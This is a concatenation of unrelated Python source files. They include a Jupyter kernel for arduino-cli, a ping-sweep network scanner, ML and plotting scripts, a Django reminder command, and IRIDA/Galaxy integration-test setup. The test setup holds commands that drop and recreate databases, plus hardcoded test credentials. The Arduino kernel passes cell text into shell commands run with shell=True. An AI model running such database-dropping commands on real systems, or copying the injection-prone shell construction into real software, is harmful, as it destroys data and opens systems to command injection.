    # Parse the DNS benchmark output from every client machine and return
    # the list of queries-per-second figures.
    # All the slaves have different performance numbers here.
    performance = []
    for slave in name_map['client']:
        data_file = folder + os.path.sep + slave + os.path.sep + \
            'data' + os.path.sep + 'dns-out'
        with open(data_file, 'r') as f:
            for line in f.readlines():
                if 'Queries per second:' in line:
                    # Filter out empty tokens from the multi-space alignment.
                    rate = float([x for x in line.split(' ') if x][3])
                    performance.append(rate)
    return performance
def get_performance(benchmark_name, benchmark_folder):
    # Map machine roles (server/client/slave) to machine names from the
    # MachineRoles file, then dispatch to the benchmark-specific parser.
    # First, from the machine roles file get the server and
    # the client folders.
    role_to_name_map = {}
    with open(benchmark_folder + os.path.sep + 'MachineRoles', 'r') as f:
        lines = f.readlines()
        for line in lines:
            if benchmark_name + '-' in line:
                _, role = line.strip().split('-')
                management_ip = line.split(' ')[0].strip()
                # Now get the name of the machine for that IP.
                # NOTE(review): the inner loop reuses (shadows) `line`.
                for line in lines:
                    if management_ip in line:
                        name = line.split(' ')[3].strip()
                        break
                if role in role_to_name_map:
                    role_to_name_map[role].append(name)
                else:
                    role_to_name_map[role] = [name]
    # How the performance is handled depends on the
    # benchmark.
    if benchmark_name == 'tensorflow':
        return tensorflow(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'dns':
        return dns(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'memcached':
        return memcached(benchmark_folder, role_to_name_map)
    elif benchmark_name == 'apache':
        return apache(benchmark_folder, role_to_name_map)
    else:
        # Unknown benchmark: report and implicitly return None.
        print "I don't know how to extract performance numbers from",
        print benchmark_name
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('results_folders', nargs='+')
parser.add_argument('--num-machines', default='7', dest='num_machines')
args = parser.parse_args()
# First, get all the individual runs out of a folder.
benchmark_folders = []
for folder in args.results_folders:
folders = [folder + os.path.sep + x for x in os.listdir(folder)]
benchmark_folders += folders
# Now, get the benchmarks that we ran.
# Also get the rates.
benchmarks = []
rates = {}
folders_by_benchmark_rate = {}
for folder in benchmark_folders:
name, rate, _ = os.path.basename(folder).split('_')
rate = int(rate)
if name not in benchmarks:
benchmarks.append(name)
if name in rates:
rates[name].append(rate)
else:
rates[name] = [rate]
folders_by_benchmark_rate[name + str(rate)] = folder
plt.clf()
# Construct a line for every benchmark.
for benchmark in benchmarks:
errors_below = []
errors_above = []
app_performances = []
values = []
plotted_rates = []
for rate in sorted(rates[benchmark]):
folder_name = folders_by_benchmark_rate[benchmark + str(rate)]
# Get all the benchmark runs:
run_parent_folder = folder_name + os.path.sep + args.num_machines + '_machines' + os.path.sep + 'run'
run_folders = os.listdir(run_parent_folder)
# How each run is parsed depends on the type
# of benchmark. Parse that.
performance = []
for run_folder in run_folders:
if not os.path.exists(run_parent_folder + os.path.sep + run_folder + os.path.sep + 'FAILED_WITH_TIMEOUT'):
performance+=get_performance(benchmark, run_parent_folder + os.path.sep + run_folder)
print benchmark
print len(performance)
if len(performance) > 0:
app_performances.append(performance)
plotted_rates.append(rate)
else:
print "No performance numbers found for ", run_parent_folder
# We normalize with respect to the highest available
# bandwidth.
highest_median = None
for performance in app_performances:
if highest_median:
highest_median = \
max(np.median(performance), highest_median)
else:
highest_median = np.median(performance)
for i in range(len(app_performances)):
app_performances[i] = np.array(app_performances[i]) / highest_median
for performance in app_performances:
value = np.median(performance)
values.append(value)
low_percentile, high_percentile = np.percentile(performance, [25, 75])
errors_below.append(value - low_percentile)
errors_above.append(high_percentile - value)
print benchmark
print plotted_rates
plt.errorbar(plotted_rates, values, yerr=(errors_below, errors_above), label=benchmark, capsize=5)
plt.ylabel('Normalized Performance')
plt.xlabel('Bandwidth Limit (Mbps)')
graph_utils.set_legend_below(ncol=4)
graph_utils.set_ticks()
graph_utils.set_non_negative_axes()
plt.xlim([0, 10000])
filename = 'bandwidth_vs_performance.eps'
plt.savefig(filename)
print "Done! File saved in: ", filename
| 7,570 | 2,222 |
import discord
from discord import app_commands as app
# Names exported by ``from <module> import *``; one entry per exception below.
__all__ = (
    "ClutterError",
    "InDevelopmentMode",
    "UserIsBlacklisted",
    "GuildIsBlacklisted",
    "UserHasBeenBlacklisted",
    "GlobalCooldownReached",
    "UnknownTranslationString",
)
class ClutterError(discord.DiscordException):
    """Base exception class that all Clutter-specific errors derive from."""
class InDevelopmentMode(ClutterError, app.AppCommandError):
    """Raised when a user is not a bot admin and the bot is in development mode when using an app command."""
class UserIsBlacklisted(ClutterError, app.AppCommandError):
    """Raised when a blacklisted user invokes an app command."""
class GuildIsBlacklisted(ClutterError, app.AppCommandError):
    """Raised when an app command is invoked from a blacklisted guild."""
class UserHasBeenBlacklisted(ClutterError, app.AppCommandError):
    """Raised when a user has been blacklisted while using an app command.

    NOTE(review): the original docstring was a copy of ``UserIsBlacklisted``'s;
    wording inferred from the class name -- confirm the exact trigger.
    """
class GlobalCooldownReached(ClutterError, app.AppCommandError):
    """Raised when the global command cooldown is reached while using an app command.

    NOTE(review): the original docstring was a copy of ``UserIsBlacklisted``'s;
    wording inferred from the class name -- confirm the exact trigger.

    Attributes:
        retry_after: cooldown delay (in seconds, by naming convention) supplied
            by the raiser.
        message: human-readable text returned by ``str()``.
    """
    def __init__(self, retry_after: float, message: str, /):
        self.retry_after = retry_after
        self.message = message
    def __str__(self) -> str:
        return self.message
class UnknownTranslationString(ClutterError, app.AppCommandError):
    """Raised when a translation string is missing."""
| 1,368 | 416 |
from .loss import Loss, NLLLoss, Perplexity
| 44 | 17 |
from ipykernel.kernelbase import Kernel
import json
import os
import subprocess
import sys
import urllib
from urllib.request import urlopen
from requests.compat import urljoin
from notebook.notebookapp import list_running_servers
from .board import Board, BoardError
SKETCH_FOLDER = ".arduino/sketch"
class ArduinoKernel(Kernel):
    """Jupyter kernel that drives the ``arduino-cli`` tool.

    A cell is one of:
      * ``arduino-cli board list``            -- list attached boards,
      * ``arduino-cli lib install ...``       -- install a library,
      * sketch source prefixed by a ``port%<port>`` and/or ``board%<fqbn>``
        header line -- written to SKETCH_FOLDER, then compiled/uploaded.
    """

    implementation = "Arduino"
    implementation_version = "1.0"
    language = "no-op"
    language_version = "0.1"
    language_info = {
        "name": "Any text",
        "mimetype": "text/plain",
        "file_extension": ".ino",
    }
    banner = "Arduino kernel"

    def __init__(self, **kwargs):
        Kernel.__init__(self, **kwargs)
        self._start_bash()

    def _start_bash(self):
        """Reset SIGINT handling and make sure the sketch folder exists."""
        from pexpect import replwrap  # noqa: F401 -- historically imported here; TODO confirm it is still needed
        import signal

        # Restore default SIGINT behaviour so child processes can be interrupted.
        signal.signal(signal.SIGINT, signal.SIG_DFL)
        try:
            os.makedirs(SKETCH_FOLDER)
        except FileExistsError:
            pass

    def _run_cli(self, command, shell):
        """Run *command* via subprocess.

        Returns ``(output, None)`` on success, or ``(None, abort_reply)`` on a
        non-zero exit; in the failure case the error text is streamed to the
        client first.  Unifies the three copy-pasted handlers of the original
        (one of which raised a bare RuntimeError out of ``do_execute``).
        """
        try:
            sp = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=shell)
        except subprocess.CalledProcessError as e:
            error_text = "Command '{}' return with error (code {}): {}".format(
                e.cmd, e.returncode, e.output
            )
            self.send_response(self.iopub_socket, "stream",
                               {"name": "stdout", "text": error_text})
            return None, {"status": "abort", "execution_count": self.execution_count}
        return sp.decode(sys.stdout.encoding), None

    def do_execute(
        self, code, silent, store_history=True, user_expressions=None, allow_stdin=False
    ):
        """Execute one notebook cell (see class docstring for the cell grammar)."""
        from pexpect import EOF

        # Empty cell: nothing to do.
        if not code.strip():
            return {
                # BUG FIX: was "OK"; the Jupyter messaging spec uses lowercase "ok".
                "status": "ok",
                "execution_count": self.execution_count,
                "payload": [],
                "user_expressions": {},
            }

        # Non-empty cell
        interrupted = False
        # BUG FIX: initialize so the stream send below cannot hit a NameError
        # when the try block is interrupted before producing any output.
        output = ""
        try:
            try:
                os.makedirs(SKETCH_FOLDER)
            except FileExistsError:
                pass
            if code == "arduino-cli board list":
                # BUG FIX: the original passed the whole command as a single
                # string with shell=False, which makes subprocess look for an
                # executable literally named "arduino-cli board list".
                output, abort = self._run_cli(["arduino-cli", "board", "list"], shell=False)
                if abort:
                    return abort
            elif code.startswith("arduino-cli lib install"):
                output, abort = self._run_cli(code, shell=True)
                if abort:
                    return abort
            else:
                # Sketch cell: parse the optional "port%..." / "board%..." header.
                oper = code.split("\n")[0]
                command = ""
                codes = ""
                if oper.split("%")[0] == "port":
                    port = oper.split("%")[1]
                    fqbn = code.split("\n")[1]
                    fqbn = fqbn.split("%")[1]
                    codes = code.split("\n", 2)[2]
                    command = (
                        "arduino-cli upload -p "
                        + port
                        + " --fqbn "
                        + fqbn
                        + " "
                        + SKETCH_FOLDER
                    )
                elif oper.split("%")[0] == "board":
                    fqbn = code.split("\n")[0]
                    fqbn = fqbn.split("%")[1]
                    codes = code.split("\n", 1)[1]
                    command = "arduino-cli compile -b " + fqbn + " " + SKETCH_FOLDER
                # Write the sketch body; context manager guarantees the file is
                # closed even if write() fails.
                with open(SKETCH_FOLDER + "/sketch.ino", "w+") as f:
                    f.write(codes.rstrip())
                output, abort = self._run_cli(command, shell=True)
                if abort:
                    return abort
        except KeyboardInterrupt:
            interrupted = True
            clean_sketches()
        # Restarting Bash
        except EOF:
            # NOTE(review): ``self.bash_wrapper`` is never assigned anywhere in
            # this class, so this recovery path would raise AttributeError --
            # confirm whether it is dead code left over from a REPL wrapper.
            output = self.bash_wrapper.child.before + "Restarting Bash"
        # If expecting output
        if not silent:
            stream_content = {"name": "stdout", "text": output}
            self.send_response(self.iopub_socket, "stream", stream_content)
        # If interrupted
        if interrupted:
            clean_sketches()
            return {"status": "abort", "execution_count": self.execution_count}
        # If everything is OK
        return {
            "status": "ok",
            "execution_count": self.execution_count,
            "payload": [],
            "user_expressions": {},
        }
def clean_sketches():
    """Remove every file from the sketch folder, if a sketch exists there.

    BUG FIX: the original removed files from ``mydir``, a name that is defined
    nowhere and raised NameError on the first call; the intended directory is
    the sketch folder itself.
    """
    sketch_dir = "./" + SKETCH_FOLDER
    if os.path.isfile(sketch_dir + "/sketch.ino"):
        for entry in os.listdir(sketch_dir):
            os.remove(os.path.join(sketch_dir, entry))
| 5,703 | 1,547 |
#-*- coding=utf-8 -*-
'''
@description: 影讯新接口——排期接口测试用例。
@author: miliang<miliang@baidu.com>
'''
from base import Info_Base
class Info_Schedule(Info_Base):
def __init__(self,cinema_id=None,encode_bid=None,bid=None):
super(Info_Schedule,self).__init__()
self.req_url = self.req_url + 'schedule'
self.req_dict = {}
if cinema_id:
self.req_dict['cinema_id'] = cinema_id
self.cinema_id = cinema_id
if encode_bid:
self.req_dict['encode_id'] = encode_id
self.encode_id = encode_id
if bid:
self.req_dict['bid'] = bid
self.bid = bid
def doAssert(self):
print self.page_dict
assert self.page_dict['errorMsg'] == 'Success'
assert self.page_dict['movie_id']
assert self.page_dict['time_table']
partner = ''
for date in self.page_dict['time_table']:
for schedule in self.page_dict['time_table'][date]:
#上一个合作方的竞争价,要求按竞争价升序排列(下线了)
#former_com_price = 0
assert schedule['time']
assert schedule['date']
assert schedule['movie_id']
assert schedule['end_time']
assert schedule.has_key('src_info')
for i in range(len(schedule['src_info'])):
assert schedule['src_info'][i]['src']
# 5.11:仅返回C端同一合作方的影讯
if partner == '':
partner = schedule['src_info'][i]['src']
else :
assert schedule['src_info'][i]['src'] == partner
assert schedule['src_info'][i].has_key('lan') # 这个暂时可能为空
assert schedule['src_info'][i].has_key('type') # 这个暂时可能为空
assert schedule['src_info'][i]['origin_price']
assert schedule['src_info'][i]['price']
assert schedule['src_info'][i].has_key('seq_no') # 这个暂时可能为空
assert schedule['src_info'][i]['third_cinema_id']
assert schedule['src_info'][i]['third_movie_id']
assert schedule['src_info'][i]['theater']
assert schedule['src_info'][i]['src_name']
assert schedule['src_info'][i]['out_buy_time']
assert schedule['src_info'][i].has_key('hall_id') # 这个暂时可能为空
assert schedule['src_info'][i].has_key('weight')
assert schedule['src_info'][i].has_key('status') and schedule['src_info'][i]['status'] == 0 or schedule['src_info'][i]['status'] == 1
#assert schedule['src_info'][i].has_key('com_price') and schedule['src_info'][i]['com_price'] >= former_com_price
#former_com_price = schedule['src_info'][i]['com_price']
# Manual smoke test: run the schedule case against a known cinema id.
if __name__ == '__main__':
    case = Info_Schedule(cinema_id=8350)
    case.execute()
| 3,022 | 1,041 |
import os
import subprocess
def ping(plage):
    """Probe every host of a /24-style prefix and print those that answer.

    plage: network prefix ending with a dot, e.g. "192.168.1.".
           Hosts plage+"0" .. plage+"254" each get a single ICMP echo.

    SECURITY FIX: the original built a shell command string from user input
    (``os.system``), allowing shell injection through ``plage``; an argv list
    with ``subprocess.call`` cannot be injected.  stdout is discarded exactly
    like the original ``>/dev/null`` redirection.
    """
    for ip in range(255):
        host = plage + str(ip)
        status = subprocess.call(["ping", "-c", "1", host],
                                 stdout=subprocess.DEVNULL)
        if status == 0:
            print(host, "est actif sur le reseau.")
def main():
    """Interactive entry point: show the banner, read a prefix, scan it."""
    os.system("clear")
    banner = "PingPy".center(25, "-")
    print(banner)
    print("\nExemple : 192.168.1.")
    print("Exemple : 192.168.0.")
    print("-" * 25)
    prefix = input("Adresses reseau a scanner: ")
    ping(prefix)
# Run the interactive scanner only when executed as a script.
if __name__=="__main__":
    main()
| 465 | 196 |
import numpy as np
import pandas as pd
def integral(df, data):
    """Cumulative trapezoidal integral of *data* over the ``df.time`` column.

    Returns a list the same length as *data*; element 0 is 0 and element k is
    the integral from time[0] to time[k].  Assumes ``df`` has a default
    integer index aligned with *data*.
    """
    result = [0]
    for idx in range(len(df.index) - 1):
        dt = df.time[idx + 1] - df.time[idx]
        # Trapezoid area of one step: mean of the two samples times the width.
        step_area = 0.5 * (data[idx] + data[idx + 1]) * dt
        result.append(result[-1] + step_area)
    return result
def derivData(df, data):
    """Numerical derivative of *data* with respect to ``df.time`` at each sample.

    Uses a forward difference at the first point, a backward difference at the
    last point, and central differences in between.  Returns a list the same
    length as *data*.

    BUG FIX: in the original, the ``i == len(df.index) - 1`` branch was
    unreachable (the loop stopped at ``len - 2``), the list was seeded with a
    spurious leading 0 so every value landed one index late, and the last
    point's derivative was never computed.
    """
    n = len(df.index)
    # Too few samples to form any difference quotient.
    if n < 2:
        return [0] * n
    deriv = []
    for i in range(n):
        if i == 0:
            deriv.append((data[1] - data[0]) / (df.time[1] - df.time[0]))
        elif i == n - 1:
            deriv.append((data[i] - data[i - 1]) / (df.time[i] - df.time[i - 1]))
        else:
            deriv.append((data[i + 1] - data[i - 1]) / (df.time[i + 1] - df.time[i - 1]))
    return deriv
def angle(df, X, Z):
    """Return arctan(X / Z) element-wise (radians).

    ``df`` is unused; the parameter is kept for signature compatibility with
    the sibling helpers in this module.  The original's ``angle = [0]`` was a
    dead assignment immediately overwritten, so it has been removed.
    """
    return np.arctan(X / Z)
def norme(df):
    """Euclidean norm of the accelerometer components, row by row.

    Expects ``df`` to carry 'accX', 'accY' and 'accZ' columns; returns a
    Series of sqrt(accX^2 + accY^2 + accZ^2).
    """
    squared_sum = df['accX'] ** 2 + df['accY'] ** 2 + df['accZ'] ** 2
    return np.sqrt(squared_sum)
| 971 | 402 |
"""Contains classes for computing and keeping track of attention distributions.
"""
from collections import namedtuple
import dynet as dy
import dynet_utils as du
class AttentionResult(namedtuple('AttentionResult',
                                 ('scores',
                                  'distribution',
                                  'vector'))):
    """Stores the result of an attention calculation.

    Fields:
        scores: raw (pre-softmax) attention scores.
        distribution: softmax of the scores.
        vector: the values weighted by the distribution (context vector).
    """
    __slots__ = ()
class Attention():
    """Attention mechanism class. Stores parameters for and computes attention.

    Attributes:
        key_size (int): The size of the key vectors.
        value_size (int): The size of the value vectors.
        query_weights (dy.Parameters): Weights projecting the query into key
            space before scores are computed.

    (The original docstring also listed transform_query/transform_key/
    transform_value flags and key/value weight matrices; none of those exist
    in this implementation -- only the query is transformed.)
    """
    def __init__(self,
                 model,
                 query_size,
                 key_size,
                 value_size):
        self.key_size = key_size
        self.value_size = value_size
        # Single projection: query_size -> key_size.
        self.query_weights = du.add_params(
            model, (query_size, self.key_size), "weights-attention-q")

    def transform_arguments(self, query, keys, values):
        """ Transforms the query/key/value inputs before attention calculations.

        Arguments:
            query (dy.Expression): Vector representing the query (e.g., hidden state.)
            keys (list of dy.Expression): List of vectors representing the key
                values.
            values (list of dy.Expression): List of vectors representing the values.

        Returns:
            triple of dy.Expression, where the first represents the (transformed)
            query, the second represents the (concatenated) keys, and the third
            represents the (concatenated) values.  Keys and values are not
            transformed, only stacked column-wise.
        """
        assert len(keys) == len(values)
        # Stack per-position vectors into matrices, one column per position.
        all_keys = dy.concatenate(keys, d=1)
        all_values = dy.concatenate(values, d=1)
        assert all_keys.dim()[0][0] == self.key_size, "Expected key size of " + \
            str(self.key_size) + " but got " + str(all_keys.dim()[0][0])
        assert all_values.dim()[0][0] == self.value_size
        # Project the query into key space so the dot product below is valid.
        query = du.linear_transform(query, self.query_weights)
        if du.is_vector(query):
            query = du.add_dim(query)
        return query, all_keys, all_values

    def __call__(self, query, keys, values=None):
        # Self-attention convenience: keys double as values when none given.
        if not values:
            values = keys
        query_t, keys_t, values_t = self.transform_arguments(query,
                                                             keys,
                                                             values)
        scores = dy.transpose(query_t * keys_t)  # raw scores, one per position
        distribution = dy.softmax(scores)        # normalized attention weights
        context_vector = values_t * distribution # weighted sum of values
        return AttentionResult(scores, distribution, context_vector)
| 3,461 | 871 |
# -*- coding: utf-8 -*-
"""
Created on Saturday - 2021
@author: DIVAKARAN
"""
import pandas as pd
import numpy as np
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from keras.models import Sequential
from keras.layers import Activation
from keras.optimizers import SGD
from keras.layers import Dense
# Load the dataset and integer-encode the categorical columns in place.
df = pd.read_csv("final.csv")
le = preprocessing.LabelEncoder()
l1 = df["Soil"]
le.fit(l1)
newsoil = le.transform(l1)
df["Soil"]=newsoil
l2 = df["Month"]
le.fit(l2)
df["Month"]=le.transform(l2)
l3 = df["State"]
le.fit(l3)
df["State"]=le.transform(l3)
#df=df.iloc[:,1:]
# Drop the first column and rebuild the frame with explicit column names.
df = pd.DataFrame(data = df.iloc[:,1:].values, columns=["Soil","Month","State","Rice","Wheat","Cotton","Sugarcane","Tea","Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
#print(df)
# Features: the three encoded categoricals.  Labels: the 15 crop columns
# (independent multi-label targets).
feat = pd.DataFrame({"Soil": df["Soil"], "Month" : df["Month"], "State": df["State"]})
labels = pd.DataFrame(data=df.iloc[:,3:],columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
#print(df)
from keras.utils import np_utils
from sklearn.model_selection import train_test_split
# 75/25 train/test split, seeded for reproducibility.
(trainData, testData, trainLabels, testLabels) = train_test_split(feat, labels, test_size=0.25, random_state=42)
print(trainData.values)
# Single-layer network: 3 inputs -> 15 sigmoid outputs, one per crop.
# NOTE(review): ``init=`` is the legacy Keras 1.x spelling of
# ``kernel_initializer`` -- confirm the installed Keras version accepts it.
model = Sequential()
model.add(Dense(15, input_dim=3, init="uniform",activation="sigmoid"))
"""
model.add(Dense(10, input_dim=3, init="uniform",activation="relu"))
print(model.output)
model.add(Dense(15, init="uniform", activation="relu"))
print(model.output)
model.add(Activation("sigmoid"))
print(model.output)
print(model.summary())
"""
#trainLabels = trainLabels.reshape((-1, 1))
print(trainData.shape, testData.shape, trainLabels.shape, testLabels.shape)
# Binary cross-entropy per output unit fits the independent multi-label setup.
sgd = SGD(lr=0.01)
model.compile(loss="binary_crossentropy", optimizer=sgd, metrics=["accuracy"])
model.fit(trainData.values, trainLabels.values, epochs=500, batch_size=10, verbose=1)
(loss, accuracy) = model.evaluate(testData.values, testLabels.values, batch_size=40, verbose=1)
print("[INFO] loss={:.4f}, accuracy: {:.4f}%".format(loss,accuracy * 100))
# Per-class probabilities for the held-out rows.
pred = model.predict_proba(testData.values)
df = pd.DataFrame(pred, columns=["Rice","Wheat","Cotton","Sugarcane","Tea", "Coffee","Cashew","Rubber","Coconut","Oilseed","Ragi","Maize","Groundnut","Millet","Barley"])
print(df)
#df['image_name'] = test_id
"""
newhh=df[['image_name','Type_1','Type_2','Type_3']]
newhh.to_csv('submission.csv', index=False)
"""
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.template.loader import get_template
from event.models import Event, Frame
from base.utils import send_template_mail
from django.utils import timezone
import datetime
import sys
import io
# Re-wrap stdout so UTF-8 text (the Japanese help/mail content) prints without
# encoding errors regardless of the console's locale.
sys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')
class Command(BaseCommand):
    # Daily reminder job, expected to run once a day at 09:00 (per ``help``):
    # sends a reminder mail to participants of events that start tomorrow, and
    # a deadline mail for frames whose registration closes tomorrow.
    help = """
    以下の動作をします。毎日午前9時に一度実行されることを想定しています。
    - 翌日開催or翌日登録締切のボランティア参加者にリマインダーを送る
    """
    from_address = "reminder@sovol.moe"

    def handle(self, *args, **options):
        """Entry point invoked by ``manage.py``; sends both mail batches."""
        self.stdout.write("running...")
        # Local midnight of today; the [today+1day, today+2days) windows below
        # therefore mean "any time tomorrow".
        today = datetime.datetime.combine(
            datetime.date.today(),
            # NOTE(review): ``timezone.LocalTimezone`` only exists in older
            # Django releases -- confirm against the project's Django version.
            datetime.time(0, 0, tzinfo=timezone.LocalTimezone())
        )
        # Events starting tomorrow: remind every participant.
        reminder_template = get_template("email/reminder.txt")
        reminder_events = Event.objects.filter(
            start_time__gte=today + datetime.timedelta(days=1),
            start_time__lt=today + datetime.timedelta(days=2),
        )
        for event in reminder_events:
            for user in event.participant.all():
                send_template_mail(
                    reminder_template,
                    {'user': user, 'event': event},
                    self.from_address,
                    [user.email]
                )
        # Frames whose registration deadline is tomorrow: send the deadline
        # mail, unless the event already got a reminder above.
        deadline_template = get_template("email/deadline.txt")
        deadline_frames = Frame.objects.filter(
            deadline__gte=today + datetime.timedelta(days=1),
            deadline__lt=today + datetime.timedelta(days=2),
        )
        for frame in deadline_frames:
            if frame.event not in reminder_events:
                for user in frame.participant.all():
                    send_template_mail(
                        deadline_template,
                        {'user': user, 'event': frame.event},
                        self.from_address,
                        [user.email]
                    )
        self.stdout.write("success...!")
| 1,978 | 610 |
import socket
import getpass
import inspect
import time
import sys
import logging
import os
import configparser
import pytest
import subprocess
from tempfile import mkdtemp
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from ...irida_import import IridaImport
from . import util
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import LegacyApplicationClient
from bioblend import galaxy
# These variables are to stop Galaxy and Irida from being changed
# during script execution. This is required if you are using your
# own instance of Galaxy and Irida.
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_STOP_GALAXY'] = "1"
# os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA'] = "1"
class TestIridaImportInt:
    """
    Perform integration tests on the IRIDA import tool for Galaxy
    To use an already running instance of Galaxy on port 8888, installation
    must be disabled, in addition to Galaxy starting/stopping
    """
    # --- timeouts, credentials, commands and endpoints shared by every test ---
    TIMEOUT = 600  # seconds
    GALAXY_SLEEP_TIME = 360
    USER = getpass.getuser()
    EMAIL = 'irida@irida.ca'
    GALAXY_PASSWORD = 'Password1'
    GALAXY_DOMAIN = 'localhost'
    GALAXY_CMD = ['bash', 'run.sh', '--daemon']
    GALAXY_STOP = ['bash', 'run.sh', '--stop-daemon']
    GALAXY_DB_RESET = 'echo "drop database if exists galaxy_test; create database galaxy_test;" | psql'
    IRIDA_DOMAIN = 'localhost'
    IRIDA_PORT = 8080
    IRIDA_URL = 'http://' + IRIDA_DOMAIN + ':' + str(IRIDA_PORT)
    IRIDA_CMD = ['mvn', 'clean', 'jetty:run',
                 '-Djdbc.url=jdbc:mysql://localhost:3306/irida_test',
                 '-Djdbc.username=test', '-Djdbc.password=test',
                 '-Dliquibase.update.database.schema=true',
                 '-Dhibernate.hbm2ddl.auto=',
                 '-Dhibernate.hbm2ddl.import_files=']
    IRIDA_STOP = 'mvn jetty:stop'
    IRIDA_DB_RESET = 'echo ' \
        '"drop database if exists irida_test;' \
        'create database irida_test;' \
        '"| mysql -u test -ptest'
    IRIDA_PASSWORD_ID = 'password_client'
    IRIDA_AUTH_CODE_ID = 'auth_code_client'
    IRIDA_REDIRECT_URI = IRIDA_URL + '/galaxy/auth_code'
    IRIDA_USER = 'admin'
    IRIDA_PASSWORD = 'Password1!'
    IRIDA_TOKEN_ENDPOINT = IRIDA_URL + '/api/oauth/token'
    IRIDA_PROJECTS = IRIDA_URL + '/api/projects'
    IRIDA_GALAXY_MODAL = 'galaxy-modal'
    WAIT = 120
    INSTALL_EXEC = 'install.sh'
    # Sequence files accessed by IRIDA's REST API will not exist when the
    # tool attempts to access them if they were not uploaded as valid sequence
    # files
    FASTQ_CONTENTS = (
        "@SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
        "TTGCCTGCCTATCATTTTAGTGCCTGTGAGGTGGAGATGTGAGGATCAGT\n" +
        "+SRR566546.970 HWUSI-EAS1673_11067_FC7070M:4:1:2299:1109 length=50\n" +
        "hhhhhhhhhhghhghhhhhfhhhhhfffffe`ee[`X]b[d[ed`[Y[^Y")

    def setup_class(self):
        """Initialize class variables, install IRIDA, Galaxy, and the tool"""
        module_dir = os.path.dirname(os.path.abspath(__file__))
        self.SCRIPTS = os.path.join(module_dir, 'bash_scripts')
        self.REPOS_PARENT = module_dir
        self.REPOS = os.path.join(module_dir, 'repos')
        self.TOOL_DIRECTORY = os.path.dirname(inspect.getfile(IridaImport))
        self.CONFIG_PATH = os.path.join(self.TOOL_DIRECTORY, 'tests',
                                        'integration', 'repos', 'galaxy',
                                        'tools', 'irida-galaxy-importer', 'irida_import',
                                        'config.ini')
        self.GALAXY = os.path.join(self.REPOS, 'galaxy')
        self.IRIDA = os.path.join(self.REPOS, 'irida')
        # Route all DEBUG logging to stdout so pytest captures it.
        log = logging.getLogger()
        log.setLevel(logging.DEBUG)
        log_out = logging.StreamHandler(sys.stdout)
        log_out.setLevel(logging.DEBUG)
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        log_out.setFormatter(formatter)
        log.addHandler(log_out)
        self.log = log
        # With installation disabled (env var set), reuse the fixed port 8080;
        # otherwise grab a free ephemeral port for a fresh Galaxy install.
        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_INSTALL']
            self.GALAXY_PORT = 8080
            self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
                self.GALAXY_PORT)
        except KeyError:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.bind(('', 0))
            self.GALAXY_PORT = sock.getsockname()[1]
            self.GALAXY_URL = 'http://' + self.GALAXY_DOMAIN + ':' + str(
                self.GALAXY_PORT)
            # Install IRIDA, Galaxy, and the IRIDA export tool:
            exec_path = os.path.join(self.SCRIPTS, self.INSTALL_EXEC)
            install = subprocess.Popen([exec_path, self.TOOL_DIRECTORY,
                                        str(self.GALAXY_PORT)],
                                       cwd=self.REPOS_PARENT)
            install.wait()  # Block until installed

    @pytest.fixture(scope='class')
    def driver(self, request):
        """Set up the Selenium WebDriver"""
        driver = webdriver.Chrome()
        driver.implicitly_wait(1)
        driver.set_window_size(1024, 768)

        def finalize_driver():
            driver.quit()
        request.addfinalizer(finalize_driver)
        return driver

    @pytest.fixture(scope='class')
    def setup_irida(self, request, driver):
        """Set up IRIDA for tests (Start if required, register, log in)"""
        def stop_irida():
            print('Stopping IRIDA nicely')
            stopper = subprocess.Popen(self.IRIDA_STOP, cwd=self.IRIDA,
                                       shell=True)
            stopper.wait()
        try:
            os.environ['IRIDA_GALAXY_TOOL_TESTS_DONT_START_IRIDA']
        except KeyError:
            stop_irida()
            # create temporary directories for IRIDA data
            data_dir = mkdtemp(prefix='irida-tmp-')
            sequence_file_dir = mkdtemp(prefix='sequence-files-', dir=data_dir)
            reference_file_dir = mkdtemp(prefix='reference-files-', dir=data_dir)
            output_file_dir = mkdtemp(prefix='output-files-', dir=data_dir)
            self.IRIDA_CMD.append('-Dsequence.file.base.directory=' + sequence_file_dir)
            self.IRIDA_CMD.append('-Dreference.file.base.directory=' + reference_file_dir)
            self.IRIDA_CMD.append('-Doutput.file.base.directory=' + output_file_dir)
            subprocess.call(self.IRIDA_DB_RESET, shell=True)
            FNULL = open(os.devnull, 'w')
            subprocess.Popen(self.IRIDA_CMD, cwd=self.IRIDA, env=os.environ,stdout=FNULL)
        util.wait_until_up(self.IRIDA_DOMAIN, self.IRIDA_PORT,
                           self.TIMEOUT)

        def finalize_irida():
            stop_irida()
        request.addfinalizer(finalize_irida)
        # Register the admin account and both OAuth clients, then hand back an
        # authorized REST session.
        self.register_irida(driver)
        self.add_irida_client_password(driver)
        self.add_irida_client_auth_code(driver)
        self.configure_irida_client_secret(driver)
        # Return an OAuth 2.0 authorized session with IRIDA
        return self.get_irida_oauth(driver)

    @pytest.fixture(scope='class')
    def setup_galaxy(self, request, driver):
        """Set up Galaxy for tests (Start if required, register, log in)"""
        def stop_galaxy():
